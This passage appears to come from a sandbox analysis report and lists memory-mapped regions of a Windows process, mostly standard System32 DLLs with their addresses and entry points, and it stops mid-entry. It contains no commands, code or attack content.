"\\Windows\\System32\\AppXDeploymentClient.dll" (normalized: "c:\\windows\\system32\\appxdeploymentclient.dll") Region: id = 1783 start_va = 0x7fffc43b0000 end_va = 0x7fffc43c8fff monitored = 0 entry_point = 0x7fffc43b51e0 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1784 start_va = 0x7fffc4470000 end_va = 0x7fffc45ddfff monitored = 0 entry_point = 0x7fffc4480f70 region_type = mapped_file name = "usermgr.dll" filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll") Region: id = 1785 start_va = 0x7fffc45e0000 end_va = 0x7fffc4608fff monitored = 0 entry_point = 0x7fffc45e2b30 region_type = mapped_file name = "mstask.dll" filename = "\\Windows\\System32\\mstask.dll" (normalized: "c:\\windows\\system32\\mstask.dll") Region: id = 1786 start_va = 0x7fffc4610000 end_va = 0x7fffc464cfff monitored = 0 entry_point = 0x7fffc461b030 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 1787 start_va = 0x7fffc4650000 end_va = 0x7fffc467bfff monitored = 0 entry_point = 0x7fffc4653c80 region_type = mapped_file name = "profsvcext.dll" filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll") Region: id = 1788 start_va = 0x7fffc4680000 end_va = 0x7fffc46f8fff monitored = 0 entry_point = 0x7fffc4697770 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 1789 start_va = 0x7fffc4710000 end_va = 0x7fffc4718fff monitored = 0 entry_point = 0x7fffc47122e0 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 1790 start_va = 0x7fffc4780000 end_va = 0x7fffc4795fff monitored = 0 entry_point = 0x7fffc4784250 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 1791 start_va = 0x7fffc47e0000 end_va = 0x7fffc47e9fff monitored = 0 entry_point = 0x7fffc47e2680 region_type = mapped_file name = "csystemeventsbrokerclient.dll" filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll") Region: id = 1792 start_va = 0x7fffc4870000 end_va = 0x7fffc48dafff monitored = 0 entry_point = 0x7fffc48725a0 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 1793 start_va = 0x7fffc48e0000 end_va = 0x7fffc48f0fff monitored = 0 entry_point = 0x7fffc48e3670 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 1794 start_va = 0x7fffc4900000 end_va = 0x7fffc4949fff monitored = 0 entry_point = 0x7fffc49149f0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 1795 start_va = 0x7fffc4950000 end_va = 0x7fffc4a1bfff monitored = 0 entry_point = 0x7fffc497db30 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 1796 start_va = 0x7fffc4a20000 end_va = 0x7fffc51b0fff monitored = 0 entry_point = 0x7fffc4a35f30 region_type = mapped_file name = "onecoreuapcommonproxystub.dll" filename = "\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll" (normalized: "c:\\windows\\system32\\onecoreuapcommonproxystub.dll") Region: id = 1797 start_va = 0x7fffc51c0000 end_va = 0x7fffc526bfff monitored = 0 entry_point = 0x7fffc51de600 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 1798 start_va = 0x7fffc5400000 end_va = 0x7fffc55b3fff monitored = 0 entry_point = 0x7fffc54768b0 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 1799 start_va = 0x7fffc56c0000 end_va = 0x7fffc58c1fff monitored = 0 entry_point = 0x7fffc572d800 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 1800 start_va = 0x7fffc58d0000 end_va = 0x7fffc5970fff monitored = 0 entry_point = 0x7fffc58e01b0 region_type = mapped_file name = "windowmanagementapi.dll" filename = "\\Windows\\System32\\WindowManagementAPI.dll" (normalized: "c:\\windows\\system32\\windowmanagementapi.dll") Region: id = 1801 start_va = 0x7fffc5c40000 end_va = 0x7fffc5c49fff monitored = 0 entry_point = 0x7fffc5c41780 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1802 start_va = 0x7fffc5c50000 end_va = 0x7fffc5c6cfff monitored = 0 entry_point = 0x7fffc5c56d40 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1803 start_va = 0x7fffc5c70000 end_va = 0x7fffc5daffff monitored = 0 entry_point = 0x7fffc5c8df50 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 1804 start_va = 0x7fffc5db0000 end_va = 0x7fffc5db7fff monitored = 0 entry_point = 0x7fffc5db14a0 region_type = mapped_file name = "dabapi.dll" filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 1805 start_va = 0x7fffc5ea0000 end_va = 0x7fffc5ed5fff monitored = 0 entry_point = 0x7fffc5eaf5a0 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1806 start_va = 0x7fffc65e0000 end_va = 0x7fffc66d4fff monitored = 0 entry_point = 0x7fffc6622860 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1807 start_va = 0x7fffc66e0000 end_va = 0x7fffc6703fff monitored = 0 entry_point = 0x7fffc66e3de0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1808 start_va = 0x7fffc6740000 end_va = 0x7fffc6753fff monitored = 0 entry_point = 0x7fffc67428c0 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1809 start_va = 0x7fffc6960000 end_va = 0x7fffc696ffff monitored = 0 entry_point = 0x7fffc69638f0 region_type = mapped_file name = "ondemandbrokerclient.dll" filename = "\\Windows\\System32\\OnDemandBrokerClient.dll" (normalized: "c:\\windows\\system32\\ondemandbrokerclient.dll") Region: id = 1810 start_va = 0x7fffc6f30000 end_va = 0x7fffc7085fff monitored = 0 entry_point = 0x7fffc6f5b240 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 1811 start_va = 0x7fffc7600000 end_va = 0x7fffc7959fff monitored = 0 entry_point = 0x7fffc7682d50 region_type = mapped_file name = "coreuicomponents.dll" filename = "\\Windows\\System32\\CoreUIComponents.dll" (normalized: "c:\\windows\\system32\\coreuicomponents.dll") Region: id = 1812 start_va = 0x7fffc7960000 end_va = 0x7fffc7a51fff monitored = 0 entry_point = 0x7fffc79b70f0 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 1813 start_va = 0x7fffc7bb0000 end_va = 0x7fffc7c3ffff monitored = 0 entry_point = 0x7fffc7bc0880 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 1814 start_va = 0x7fffc7d20000 end_va = 0x7fffc7d2bfff monitored = 0 entry_point = 0x7fffc7d22ba0 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 1815 start_va = 0x7fffc7d40000 end_va = 0x7fffc7d53fff monitored = 0 entry_point = 0x7fffc7d44280 region_type = mapped_file name = "resourcepolicyclient.dll" filename = "\\Windows\\System32\\ResourcePolicyClient.dll" (normalized: "c:\\windows\\system32\\resourcepolicyclient.dll") Region: id = 1816 start_va = 0x7fffc7f10000 end_va = 0x7fffc7f39fff monitored = 0 entry_point = 0x7fffc7f19e30 region_type = mapped_file name = "rmclient.dll" filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll") Region: id = 1817 start_va = 0x7fffc8120000 end_va = 0x7fffc8132fff monitored = 0 entry_point = 0x7fffc8123f60 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1818 start_va = 0x7fffc8320000 end_va = 0x7fffc8aa9fff monitored = 0 entry_point = 0x7fffc84dc050 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1819 start_va = 0x7fffc8ab0000 end_va = 0x7fffc8abcfff monitored = 0 entry_point = 0x7fffc8ab26a0 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 1820 start_va = 0x7fffc8ac0000 end_va = 0x7fffc8ae2fff monitored = 0 entry_point = 0x7fffc8ac3700 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1821 start_va = 0x7fffc8e50000 end_va = 0x7fffc8e9bfff monitored = 0 entry_point = 0x7fffc8e59820 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 1822 start_va = 0x7fffc8f30000 end_va = 0x7fffc8f5efff monitored = 0 entry_point = 0x7fffc8f372e0 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 1823 start_va = 0x7fffc8f60000 end_va = 0x7fffc8ff2fff monitored = 0 entry_point = 0x7fffc8f68f80 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1824 start_va = 0x7fffc9000000 end_va = 0x7fffc9032fff monitored = 0 entry_point = 0x7fffc9006930 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1825 start_va = 0x7fffc9150000 end_va = 0x7fffc91e0fff monitored = 0 entry_point = 0x7fffc9175d30 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 1826 start_va = 0x7fffc9230000 end_va = 0x7fffc9263fff monitored = 0 entry_point = 0x7fffc9236e70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1827 start_va = 0x7fffc9270000 end_va = 0x7fffc9279fff monitored = 0 entry_point = 0x7fffc9271850 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 1828 start_va = 0x7fffc92d0000 end_va = 0x7fffc9359fff monitored = 0 entry_point = 0x7fffc9315870 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 1829 start_va = 0x7fffc9360000 end_va = 0x7fffc9376fff monitored = 0 entry_point = 0x7fffc9361d60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1830 start_va = 0x7fffc9590000 end_va = 0x7fffc95cafff monitored = 0 entry_point = 0x7fffc959a620 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1831 start_va = 0x7fffc95d0000 end_va = 0x7fffc95dbfff monitored = 0 entry_point = 0x7fffc95d1ce0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1832 start_va = 0x7fffc95e0000 end_va = 0x7fffc96a9fff monitored = 0 entry_point = 0x7fffc960bc80 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1833 start_va = 0x7fffc96b0000 end_va = 0x7fffc96f1fff monitored = 0 entry_point = 0x7fffc96ba3e0 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1834 start_va = 0x7fffc98a0000 end_va = 0x7fffc9909fff monitored = 0 entry_point = 0x7fffc98b0e90 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1835 start_va = 0x7fffc9a70000 end_va = 0x7fffc9a87fff monitored = 0 entry_point = 0x7fffc9a74aa0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1836 start_va = 0x7fffc9a90000 end_va = 0x7fffc9a9bfff monitored = 0 entry_point = 0x7fffc9a92200 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1837 start_va = 0x7fffc9ad0000 end_va = 0x7fffc9b29fff monitored = 0 entry_point = 0x7fffc9adb770 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1838 start_va = 0x7fffc9b30000 end_va = 0x7fffc9b5afff monitored = 0 entry_point = 0x7fffc9b4a3a0 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 1839 start_va = 0x7fffc9b80000 end_va = 0x7fffc9baafff monitored = 0 entry_point = 0x7fffc9b82db0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 1840 start_va = 0x7fffc9bb0000 end_va = 0x7fffc9beafff monitored = 0 entry_point = 0x7fffc9bb4000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 1841 start_va = 0x7fffc9bf0000 end_va = 0x7fffc9c16fff monitored = 0 entry_point = 0x7fffc9bf6200 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 1842 start_va = 0x7fffc9d00000 end_va = 0x7fffc9d11fff monitored = 0 entry_point = 0x7fffc9d055f0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1843 start_va = 0x7fffc9ec0000 end_va = 0x7fffc9eebfff monitored = 0 entry_point = 0x7fffc9ec7370 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1844 start_va = 0x7fffc9ef0000 end_va = 0x7fffc9f08fff monitored = 0 entry_point = 0x7fffc9efc950 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 1845 start_va = 0x7fffc9f10000 end_va = 0x7fffc9f21fff monitored = 0 entry_point = 0x7fffc9f13e30 region_type = mapped_file name = "umpdc.dll" filename = "\\Windows\\System32\\umpdc.dll" (normalized: "c:\\windows\\system32\\umpdc.dll") Region: id = 1846 start_va = 0x7fffc9f30000 end_va = 0x7fffc9f7afff monitored = 0 entry_point = 0x7fffc9f33480 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1847 start_va = 0x7fffc9f80000 end_va = 0x7fffca021fff monitored = 0 entry_point = 0x7fffc9faca60 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1848 start_va = 0x7fffca030000 end_va = 0x7fffca05dfff monitored = 0 entry_point = 0x7fffca034f10 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1849 start_va = 0x7fffca060000 end_va = 0x7fffca090fff monitored = 0 entry_point = 0x7fffca06e380 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1850 start_va = 0x7fffca0b0000 end_va = 0x7fffca0cefff monitored = 0 entry_point = 0x7fffca0b8ca0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1851 start_va = 0x7fffca220000 end_va = 0x7fffca26cfff monitored = 0 entry_point = 0x7fffca233280 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1852 start_va = 0x7fffca270000 end_va = 0x7fffca36ffff monitored = 0 entry_point = 0x7fffca285ac0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 1853 start_va = 0x7fffca370000 end_va = 0x7fffca479fff monitored = 0 entry_point = 0x7fffca3a1300 region_type = mapped_file name = "gdi32full.dll" filename = "\\Windows\\System32\\gdi32full.dll" (normalized: "c:\\windows\\system32\\gdi32full.dll") Region: id = 1854 start_va = 0x7fffca480000 end_va = 0x7fffca4fefff monitored = 0 entry_point = 0x7fffca4b73e0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1855 start_va = 0x7fffca500000 end_va = 0x7fffca55ffff monitored = 0 entry_point = 0x7fffca510380 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1856 start_va = 0x7fffca560000 end_va = 0x7fffca5fcfff monitored = 0 entry_point = 0x7fffca575390 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 1857 start_va = 0x7fffca600000 end_va = 0x7fffca75cfff monitored = 0 entry_point = 0x7fffca64efa0 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1858 start_va = 0x7fffca760000 end_va = 0x7fffca781fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "win32u.dll" filename = "\\Windows\\System32\\win32u.dll" (normalized: "c:\\windows\\system32\\win32u.dll") Region: id = 1859 start_va = 0x7fffca790000 end_va = 0x7fffcaa56fff monitored = 0 entry_point = 0x7fffca7a1bd0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1860 start_va = 0x7fffcaa60000 end_va = 0x7fffcaa86fff monitored = 0 entry_point = 0x7fffcaa68690 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1861 start_va = 0x7fffcad60000 end_va = 0x7fffcad7cfff monitored = 0 entry_point = 0x7fffcad623b0 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\System32\\imagehlp.dll" (normalized: "c:\\windows\\system32\\imagehlp.dll") Region: id = 1862 start_va = 0x7fffcad80000 end_va = 0x7fffcae2dfff monitored = 0 entry_point = 0x7fffcadbb940 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1863 start_va = 0x7fffcb2a0000 end_va = 0x7fffcb33afff monitored = 0 entry_point = 0x7fffcb2bc3e0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1864 start_va = 0x7fffcb350000 end_va = 0x7fffcb424fff monitored = 0 entry_point = 0x7fffcb36d190 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1865 start_va = 0x7fffcb440000 end_va = 0x7fffcb4fcfff monitored = 0 entry_point = 0x7fffcb457070 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1866 start_va = 0x7fffcb560000 end_va = 0x7fffcb5fdfff monitored = 0 entry_point = 0x7fffcb567850 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1867 start_va = 0x7fffcb600000 end_va = 0x7fffcb6a9fff monitored = 0 entry_point = 0x7fffcb615470 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1868 start_va = 0x7fffcb790000 end_va = 0x7fffcb798fff monitored = 0 entry_point = 0x7fffcb792020 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1869 start_va = 0x7fffcb7a0000 end_va = 0x7fffcb93ffff monitored = 0 entry_point = 0x7fffcb7b7a10 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1870 start_va = 0x7fffcb970000 end_va = 0x7fffcb9c4fff monitored = 0 entry_point = 0x7fffcb97a7e0 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1871 start_va = 0x7fffcb9d0000 end_va = 0x7fffcba48fff monitored = 0 entry_point = 0x7fffcb9f28f0 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 1872 start_va = 0x7fffcbae0000 end_va = 0x7fffcbb87fff monitored = 0 entry_point = 0x7fffcbafd990 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1873 start_va = 0x7fffcbb90000 end_va = 0x7fffcbee3fff monitored = 0 entry_point = 0x7fffcbc81d00 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1874 start_va = 0x7fffcbef0000 end_va = 0x7fffcc018fff monitored = 0 entry_point = 0x7fffcbf16140 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1875 start_va = 0x7fffcc020000 end_va = 0x7fffcc08afff monitored = 0 entry_point = 0x7fffcc034300 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1876 start_va = 0x7fffcc090000 end_va = 0x7fffcc7c0fff monitored = 0 entry_point = 0x7fffcc19e6e0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1877 start_va = 0x7fffcc830000 end_va = 0x7fffcc952fff monitored = 0 entry_point = 0x7fffcc88da30 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1878 start_va = 0x7fffcc960000 end_va = 0x7fffcc989fff monitored = 0 entry_point = 0x7fffcc9648d0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1879 start_va = 0x7fffcc990000 end_va = 0x7fffcc9e5fff monitored = 0 entry_point = 0x7fffcc992840 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1880 start_va = 0x7fffcca30000 end_va = 0x7fffccc23fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2044 start_va = 0x7fffabd60000 end_va = 0x7fffabd82fff monitored = 0 entry_point = 0x7fffabd72c30 region_type = mapped_file name = "waasassessment.dll" filename = "\\Windows\\System32\\WaaSAssessment.dll" (normalized: "c:\\windows\\system32\\waasassessment.dll") Region: id = 2045 start_va = 0x2a10000 end_va = 0x2a12fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a10000" filename = "" Region: id = 2047 start_va = 0x2a10000 end_va = 0x2a12fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a10000" filename = "" Region: id = 2048 start_va = 0x9a00000 end_va = 0x9bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a00000" filename = "" Region: id = 2051 start_va = 0x8800000 end_va = 0x8829fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows.web.dll.mui" filename = "\\Windows\\System32\\en-US\\Windows.Web.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\windows.web.dll.mui") Region: id = 2168 start_va = 0x7fffae280000 end_va = 0x7fffae29efff monitored = 0 entry_point = 0x7fffae28e410 region_type = mapped_file name = "utcutil.dll" filename = "\\Windows\\System32\\utcutil.dll" (normalized: "c:\\windows\\system32\\utcutil.dll") Region: id = 2169 start_va = 0x7fffbc5b0000 end_va = 0x7fffbc64bfff monitored = 0 entry_point = 0x7fffbc617870 region_type = mapped_file name = "dcntel.dll" filename = "\\Windows\\System32\\dcntel.dll" (normalized: "c:\\windows\\system32\\dcntel.dll") Region: id = 2170 start_va = 0x2a10000 end_va = 0x2a11fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a10000" filename = "" Region: id = 2171 start_va = 0x95e0000 end_va = 0x96dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000095e0000" filename = "" Region: id = 2172 start_va = 0x7fffab900000 end_va = 0x7fffab9aefff monitored = 0 entry_point = 0x7fffab919720 region_type = mapped_file name = "configmanager2.dll" filename = "\\Windows\\System32\\configmanager2.dll" (normalized: "c:\\windows\\system32\\configmanager2.dll") Region: id = 2173 start_va = 0x7fffbe610000 end_va = 0x7fffbe642fff monitored = 0 entry_point = 0x7fffbe62cfd0 region_type = mapped_file name = "dmcmnutils.dll" filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll") Region: id = 2174 start_va = 0x7fffb9e50000 end_va = 0x7fffb9e58fff monitored = 0 entry_point = 0x7fffb9e51380 region_type = mapped_file name = "dmiso8601utils.dll" filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll") Region: id = 2175 start_va = 0x7fffbc1a0000 end_va = 0x7fffbc1abfff monitored = 0 entry_point = 0x7fffbc1a31c0 region_type = mapped_file name = "dmoleaututils.dll" filename = "\\Windows\\System32\\dmoleaututils.dll" (normalized: "c:\\windows\\system32\\dmoleaututils.dll") Region: id = 2176 start_va = 0x7fffad1b0000 end_va = 0x7fffad1cffff monitored = 0 entry_point = 0x7fffad1c2180 region_type = mapped_file name = "enterpriseresourcemanager.dll" filename = "\\Windows\\System32\\enterpriseresourcemanager.dll" (normalized: 